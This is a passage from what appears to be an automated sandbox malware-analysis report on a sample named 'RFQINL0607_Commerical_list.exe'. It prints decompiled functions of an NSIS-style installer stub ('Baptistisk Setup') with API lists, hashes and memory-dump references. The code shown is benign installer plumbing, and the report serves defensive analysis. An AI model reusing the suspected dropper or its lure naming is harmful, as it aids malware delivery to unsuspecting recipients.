					if(_t51 < 0xffff3333) {
						_t50 = 0x14;
						asm("cdq");
						_t22 = 1 / _t50 + _t51;
					}
					_t23 = _t22 & 0x00ffffff;
					_t53 = _t22 >> 0;
					_t43 = 0xa;
					_t47 = ((_t22 & 0x00ffffff) + _t23 * 4 + (_t22 & 0x00ffffff) + _t23 * 4 >> 0) % _t43;
				} else {
					_t53 = (_t21 << 0x00000020 | _t51) >> 0x14;
					_t47 = 0;
				}
				_t29 = E00405D51(_t41, _t47, _t53,  &_v36, 0xffffffdf);
				_t31 = E00405D51(_t41, _t47, _t53,  &_v68, _t41);
				_t32 = E00405D51(_t41, _t47, 0x429868, 0x429868, _a8);
				wsprintfA(_t32 + lstrlenA(0x429868), "%u.%u%s%s", _t53, _t47, _t31, _t29);
				return SetDlgItemTextA( *0x42dbd8, _a4, 0x429868);
			}



















                                                                                                                                                                                  0x0040470f
                                                                                                                                                                                  0x00404714
                                                                                                                                                                                  0x0040471c
                                                                                                                                                                                  0x0040471d
                                                                                                                                                                                  0x0040472a
                                                                                                                                                                                  0x00404732
                                                                                                                                                                                  0x00404733
                                                                                                                                                                                  0x00404735
                                                                                                                                                                                  0x00404737
                                                                                                                                                                                  0x00404739
                                                                                                                                                                                  0x0040473c
                                                                                                                                                                                  0x0040473c
                                                                                                                                                                                  0x00404743
                                                                                                                                                                                  0x00404749
                                                                                                                                                                                  0x00404749
                                                                                                                                                                                  0x00404750
                                                                                                                                                                                  0x00404757
                                                                                                                                                                                  0x0040475a
                                                                                                                                                                                  0x0040475d
                                                                                                                                                                                  0x0040475d
                                                                                                                                                                                  0x00404761
                                                                                                                                                                                  0x00404771
                                                                                                                                                                                  0x00404773
                                                                                                                                                                                  0x00404776
                                                                                                                                                                                  0x0040471f
                                                                                                                                                                                  0x0040471f
                                                                                                                                                                                  0x00404726
                                                                                                                                                                                  0x00404726
                                                                                                                                                                                  0x0040477e
                                                                                                                                                                                  0x00404789
                                                                                                                                                                                  0x0040479f
                                                                                                                                                                                  0x004047af
                                                                                                                                                                                  0x004047cb

                                                                                                                                                                                  APIs
                                                                                                                                                                                  • lstrlenA.KERNEL32(Baptistisk Setup: Installing,Baptistisk Setup: Installing,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404624,000000DF,00000000,00000400,?), ref: 004047A7
                                                                                                                                                                                  • wsprintfA.USER32 ref: 004047AF
                                                                                                                                                                                  • SetDlgItemTextA.USER32(?,Baptistisk Setup: Installing), ref: 004047C2
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.11499590101.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  • Associated: 00000000.00000002.11499558014.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499653111.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499692800.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499692800.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499692800.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499692800.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499692800.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11500049722.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11500049722.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11500049722.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11500049722.0000000000486000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11500049722.0000000000494000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_RFQINL0607_Commerical_list.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: ItemTextlstrlenwsprintf
                                                                                                                                                                                  • String ID: %u.%u%s%s$Baptistisk Setup: Installing
                                                                                                                                                                                  • API String ID: 3540041739-3130624808
                                                                                                                                                                                  • Opcode ID: 1472cf9e36570b38fa99e832c46bb30f5d20a58f0764e004e3f2a6e79c89f0d0
                                                                                                                                                                                  • Instruction ID: 053aaa49463ee093dad042f908cd6657d31450f6c5b0c7846562dfb37f065ee1
                                                                                                                                                                                  • Opcode Fuzzy Hash: 1472cf9e36570b38fa99e832c46bb30f5d20a58f0764e004e3f2a6e79c89f0d0
                                                                                                                                                                                  • Instruction Fuzzy Hash: 0E11E473A041283BDB0065A99C45EAF3288DB82374F254237FA25F71D1EA78CC1286A8
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  Function 00403974 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 71COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                                  			E00403974(void* __ecx, void* __eflags) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed short _t6;
				intOrPtr _t11;
				signed int _t13;
				signed int _t16;
				signed short* _t18;
				signed int _t20;
				signed short* _t23;
				intOrPtr _t25;
				signed int _t26;
				intOrPtr* _t27;

				_t24 = "1033";
				_t13 = 0xffff;
				_t6 = E00405CA6(__ecx, "1033");
				while(1) {
					_t26 =  *0x42e444;
					if(_t26 == 0) {
						goto L7;
					}
					_t16 =  *( *0x42e410 + 0x64);
					_t20 =  ~_t16;
					_t18 = _t16 * _t26 +  *0x42e440;
					while(1) {
						_t18 = _t18 + _t20;
						_t26 = _t26 - 1;
						if((( *_t18 ^ _t6) & _t13) == 0) {
							break;
						}
						if(_t26 != 0) {
							continue;
						}
						goto L7;
					}
					 *0x42dbe0 = _t18[1];
					 *0x42e4a8 = _t18[3];
					_t23 =  &(_t18[5]);
					if(_t23 != 0) {
						 *0x42dbdc = _t23;
						E00405C8D(_t24,  *_t18 & 0x0000ffff);
						SetWindowTextA( *0x429848, E00405D51(_t13, _t24, _t26, "Baptistisk Setup", 0xfffffffe));
						_t11 =  *0x42e42c;
						_t27 =  *0x42e428;
						if(_t11 == 0) {
							L15:
							return _t11;
						}
						_t25 = _t11;
						do {
							_t11 =  *_t27;
							if(_t11 != 0) {
								_t11 = E00405D51(_t13, _t25, _t27, _t27 + 0x18, _t11);
							}
							_t27 = _t27 + 0x418;
							_t25 = _t25 - 1;
						} while (_t25 != 0);
						goto L15;
					}
					L7:
					if(_t13 != 0xffff) {
						_t13 = 0;
					} else {
						_t13 = 0x3ff;
					}
				}
			}
















                                                                                                                                                                                  0x00403978
                                                                                                                                                                                  0x0040397d
                                                                                                                                                                                  0x00403983
                                                                                                                                                                                  0x00403988
                                                                                                                                                                                  0x00403988
                                                                                                                                                                                  0x00403990
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00403998
                                                                                                                                                                                  0x004039a0
                                                                                                                                                                                  0x004039a2
                                                                                                                                                                                  0x004039a8
                                                                                                                                                                                  0x004039a8
                                                                                                                                                                                  0x004039aa
                                                                                                                                                                                  0x004039b6
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x004039ba
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x004039bc
                                                                                                                                                                                  0x004039c1
                                                                                                                                                                                  0x004039ca
                                                                                                                                                                                  0x004039d0
                                                                                                                                                                                  0x004039d5
                                                                                                                                                                                  0x004039e9
                                                                                                                                                                                  0x004039f4
                                                                                                                                                                                  0x00403a0c
                                                                                                                                                                                  0x00403a12
                                                                                                                                                                                  0x00403a17
                                                                                                                                                                                  0x00403a1f
                                                                                                                                                                                  0x00403a40
                                                                                                                                                                                  0x00403a40
                                                                                                                                                                                  0x00403a40
                                                                                                                                                                                  0x00403a21
                                                                                                                                                                                  0x00403a23
                                                                                                                                                                                  0x00403a23
                                                                                                                                                                                  0x00403a27
                                                                                                                                                                                  0x00403a2e
                                                                                                                                                                                  0x00403a2e
                                                                                                                                                                                  0x00403a33
                                                                                                                                                                                  0x00403a39
                                                                                                                                                                                  0x00403a39
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00403a23
                                                                                                                                                                                  0x004039d7
                                                                                                                                                                                  0x004039dc
                                                                                                                                                                                  0x004039e5
                                                                                                                                                                                  0x004039de
                                                                                                                                                                                  0x004039de
                                                                                                                                                                                  0x004039de
                                                                                                                                                                                  0x004039dc

                                                                                                                                                                                  APIs
                                                                                                                                                                                  • SetWindowTextA.USER32(00000000,Baptistisk Setup), ref: 00403A0C
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.11499590101.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  • Associated: 00000000.00000002.11499558014.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499653111.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499692800.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499692800.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499692800.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499692800.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499692800.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11500049722.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11500049722.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11500049722.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11500049722.0000000000486000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11500049722.0000000000494000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_RFQINL0607_Commerical_list.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: TextWindow
                                                                                                                                                                                  • String ID: "C:\Users\user\Desktop\RFQINL0607_Commerical_list.exe"$1033$Baptistisk Setup$Baptistisk Setup: Installing
                                                                                                                                                                                  • API String ID: 530164218-3220119465
                                                                                                                                                                                  • Opcode ID: c35f14d8ae607f964b1d366d12cd70842dee39e56cae11f13a59ba4c30930c7f
                                                                                                                                                                                  • Instruction ID: fbf6035dbb292e76ee93bcdc762ea67a79fb5cde0254510f453a1e05a67cff09
                                                                                                                                                                                  • Opcode Fuzzy Hash: c35f14d8ae607f964b1d366d12cd70842dee39e56cae11f13a59ba4c30930c7f
                                                                                                                                                                                  • Instruction Fuzzy Hash: 97110871B046109BC730AF56DC409737B6CEF89319368423FE801A73D1D639AD03CAA9
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  Function 00402A7A Relevance: 7.6, APIs: 5, Instructions: 67registryCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  C-Code - Quality: 84%
                                                                                                                                                                                  			E00402A7A(void* _a4, char* _a8, intOrPtr _a12) {
				void* _v8;
				char _v272;
				long _t18;
				intOrPtr* _t27;
				long _t28;

				_t18 = RegOpenKeyExA(_a4, _a8, 0,  *0x42e4b0 | 0x00000008,  &_v8);
				if(_t18 == 0) {
					while(RegEnumKeyA(_v8, 0,  &_v272, 0x105) == 0) {
						if(_a12 != 0) {
							RegCloseKey(_v8);
							L8:
							return 1;
						}
						if(E00402A7A(_v8,  &_v272, 0) != 0) {
							break;
						}
					}
					RegCloseKey(_v8);
					_t27 = E004060C8(3);
					if(_t27 == 0) {
						if( *0x42e4b0 != 0) {
							goto L8;
						}
						_t28 = RegDeleteKeyA(_a4, _a8);
						if(_t28 != 0) {
							goto L8;
						}
						return _t28;
					}
					return  *_t27(_a4, _a8,  *0x42e4b0, 0);
				}
				return _t18;
			}








                                                                                                                                                                                  0x00402a9b
                                                                                                                                                                                  0x00402aa3
                                                                                                                                                                                  0x00402acb
                                                                                                                                                                                  0x00402ab5
                                                                                                                                                                                  0x00402b05
                                                                                                                                                                                  0x00402b0b
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00402b0d
                                                                                                                                                                                  0x00402ac9
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00402ac9
                                                                                                                                                                                  0x00402ae0
                                                                                                                                                                                  0x00402ae8
                                                                                                                                                                                  0x00402aef
                                                                                                                                                                                  0x00402b1b
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00402b23
                                                                                                                                                                                  0x00402b2b
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00402b2b
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00402afe
                                                                                                                                                                                  0x00402b12

                                                                                                                                                                                  APIs
                                                                                                                                                                                  • RegOpenKeyExA.ADVAPI32(?,?,00000000,?,?), ref: 00402A9B
                                                                                                                                                                                  • RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402AD7
                                                                                                                                                                                  • RegCloseKey.ADVAPI32(?), ref: 00402AE0
                                                                                                                                                                                  • RegCloseKey.ADVAPI32(?), ref: 00402B05
                                                                                                                                                                                  • RegDeleteKeyA.ADVAPI32(?,?), ref: 00402B23
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.11499590101.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  • Associated: 00000000.00000002.11499558014.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499653111.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499692800.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499692800.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499692800.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499692800.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499692800.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11500049722.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11500049722.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11500049722.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11500049722.0000000000486000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11500049722.0000000000494000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_RFQINL0607_Commerical_list.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: Close$DeleteEnumOpen
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 1912718029-0
                                                                                                                                                                                  • Opcode ID: 7766ad722bcf743109a83c91df0766a7f4c549130a1e07b93abaa864288c9da4
                                                                                                                                                                                  • Instruction ID: e0b40e6d550d0c6dedecb0be42375ee7245bd63e637183e656586a56a8cfacd8
                                                                                                                                                                                  • Opcode Fuzzy Hash: 7766ad722bcf743109a83c91df0766a7f4c549130a1e07b93abaa864288c9da4
                                                                                                                                                                                  • Instruction Fuzzy Hash: 66116D31A00108FEDF22AF90DE89EAA3B7DEB54349B104436FA01B10E0D774AE51DB69
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  Function 00401CDE Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                                  			E00401CDE(int __edx) {
				void* _t17;
				struct HINSTANCE__* _t21;
				struct HWND__* _t25;
				void* _t27;

				_t25 = GetDlgItem( *(_t27 - 8), __edx);
				GetClientRect(_t25, _t27 - 0x58);
				_t17 = SendMessageA(_t25, 0x172, _t21, LoadImageA(_t21, E00402A3A(_t21), _t21,  *(_t27 - 0x50) *  *(_t27 - 0x20),  *(_t27 - 0x4c) *  *(_t27 - 0x20), 0x10));
				if(_t17 != _t21) {
					DeleteObject(_t17);
				}
				 *0x42e488 =  *0x42e488 +  *((intOrPtr*)(_t27 - 4));
				return 0;
			}







                                                                                                                                                                                  0x00401ce8
                                                                                                                                                                                  0x00401cef
                                                                                                                                                                                  0x00401d1e
                                                                                                                                                                                  0x00401d26
                                                                                                                                                                                  0x00401d2d
                                                                                                                                                                                  0x00401d2d
                                                                                                                                                                                  0x004028d2
                                                                                                                                                                                  0x004028de

                                                                                                                                                                                  APIs
                                                                                                                                                                                  • GetDlgItem.USER32(?), ref: 00401CE2
                                                                                                                                                                                  • GetClientRect.USER32(00000000,?), ref: 00401CEF
                                                                                                                                                                                  • LoadImageA.USER32(?,00000000,?,?,?,?), ref: 00401D10
                                                                                                                                                                                  • SendMessageA.USER32(00000000,00000172,?,00000000), ref: 00401D1E
                                                                                                                                                                                  • DeleteObject.GDI32(00000000), ref: 00401D2D
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.11499590101.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  • Associated: 00000000.00000002.11499558014.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499653111.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499692800.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499692800.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499692800.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499692800.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499692800.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11500049722.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11500049722.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11500049722.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11500049722.0000000000486000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11500049722.0000000000494000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_RFQINL0607_Commerical_list.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 1849352358-0
                                                                                                                                                                                  • Opcode ID: 763b4bf58b938fb9abbbbf1fb7f74f3e5dbcbbd1c05f8ded2862ff9186105390
                                                                                                                                                                                  • Instruction ID: 718a49c372d49eeeb619100b459207f1cde729867d9d835a9e14b5832590348d
                                                                                                                                                                                  • Opcode Fuzzy Hash: 763b4bf58b938fb9abbbbf1fb7f74f3e5dbcbbd1c05f8ded2862ff9186105390
                                                                                                                                                                                  • Instruction Fuzzy Hash: 74F0E7B2A04114AFEB01EBE4DE88DAFB7BDEB54305B10447AF602F6191C7749D018B79
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  Function 004057A1 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                                  			E004057A1(CHAR* _a4) {
				CHAR* _t7;

				_t7 = _a4;
				if( *(CharPrevA(_t7,  &(_t7[lstrlenA(_t7)]))) != 0x5c) {
					lstrcatA(_t7, 0x409014);
				}
				return _t7;
			}




                                                                                                                                                                                  0x004057a2
                                                                                                                                                                                  0x004057b9
                                                                                                                                                                                  0x004057c1
                                                                                                                                                                                  0x004057c1
                                                                                                                                                                                  0x004057c9

                                                                                                                                                                                  APIs
                                                                                                                                                                                  • lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,004030FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004032FF), ref: 004057A7
                                                                                                                                                                                  • CharPrevA.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,004030FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004032FF), ref: 004057B0
                                                                                                                                                                                  • lstrcatA.KERNEL32(?,00409014), ref: 004057C1
                                                                                                                                                                                  Strings
                                                                                                                                                                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 004057A1
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.11499590101.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  • Associated: 00000000.00000002.11499558014.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499653111.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499692800.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499692800.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499692800.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499692800.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499692800.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11500049722.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11500049722.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11500049722.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11500049722.0000000000486000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11500049722.0000000000494000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_RFQINL0607_Commerical_list.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: CharPrevlstrcatlstrlen
                                                                                                                                                                                  • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                                                                                                  • API String ID: 2659869361-3355392842
                                                                                                                                                                                  • Opcode ID: 39623dee3265ed167cf4eb0d952b1efefe5673d98ca6e2622bb109ae9f6b3ea7
                                                                                                                                                                                  • Instruction ID: 31daa9478c60f2ec517fa6cf0afa0cd81b34b06dfe81de980877f4a94ee531a8
                                                                                                                                                                                  • Opcode Fuzzy Hash: 39623dee3265ed167cf4eb0d952b1efefe5673d98ca6e2622bb109ae9f6b3ea7
                                                                                                                                                                                  • Instruction Fuzzy Hash: 8ED0A762505D306BE21226155C09D8B2A08CF12740B044027F100B61E1C63C4D414FFD
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  Function 00402C02 Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                                  			E00402C02(intOrPtr _a4) {
				long _t2;
				struct HWND__* _t3;
				struct HWND__* _t6;

				if(_a4 == 0) {
					__eflags =  *0x420420; // 0x0
					if(__eflags == 0) {
						_t2 = GetTickCount();
						__eflags = _t2 -  *0x42e40c;
						if(_t2 >  *0x42e40c) {
							_t3 = CreateDialogParamA( *0x42e400, 0x6f, 0, E00402B7F, 0);
							 *0x420420 = _t3;
							return ShowWindow(_t3, 5);
						}
						return _t2;
					} else {
						return E00406104(0);
					}
				} else {
					_t6 =  *0x420420; // 0x0
					if(_t6 != 0) {
						_t6 = DestroyWindow(_t6);
					}
					 *0x420420 = 0;
					return _t6;
				}
			}






                                                                                                                                                                                  0x00402c09
                                                                                                                                                                                  0x00402c23
                                                                                                                                                                                  0x00402c29
                                                                                                                                                                                  0x00402c33
                                                                                                                                                                                  0x00402c39
                                                                                                                                                                                  0x00402c3f
                                                                                                                                                                                  0x00402c50
                                                                                                                                                                                  0x00402c59
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00402c5e
                                                                                                                                                                                  0x00402c65
                                                                                                                                                                                  0x00402c2b
                                                                                                                                                                                  0x00402c32
                                                                                                                                                                                  0x00402c32
                                                                                                                                                                                  0x00402c0b
                                                                                                                                                                                  0x00402c0b
                                                                                                                                                                                  0x00402c12
                                                                                                                                                                                  0x00402c15
                                                                                                                                                                                  0x00402c15
                                                                                                                                                                                  0x00402c1b
                                                                                                                                                                                  0x00402c22
                                                                                                                                                                                  0x00402c22

                                                                                                                                                                                  APIs
                                                                                                                                                                                  • DestroyWindow.USER32(00000000,00000000,00402DE2,?), ref: 00402C15
                                                                                                                                                                                  • GetTickCount.KERNEL32 ref: 00402C33
                                                                                                                                                                                  • CreateDialogParamA.USER32(0000006F,00000000,00402B7F,00000000), ref: 00402C50
                                                                                                                                                                                  • ShowWindow.USER32(00000000,00000005), ref: 00402C5E
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.11499590101.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  • Associated: 00000000.00000002.11499558014.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499653111.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499692800.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499692800.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499692800.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499692800.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499692800.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11500049722.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11500049722.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11500049722.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11500049722.0000000000486000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11500049722.0000000000494000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_RFQINL0607_Commerical_list.jbxd
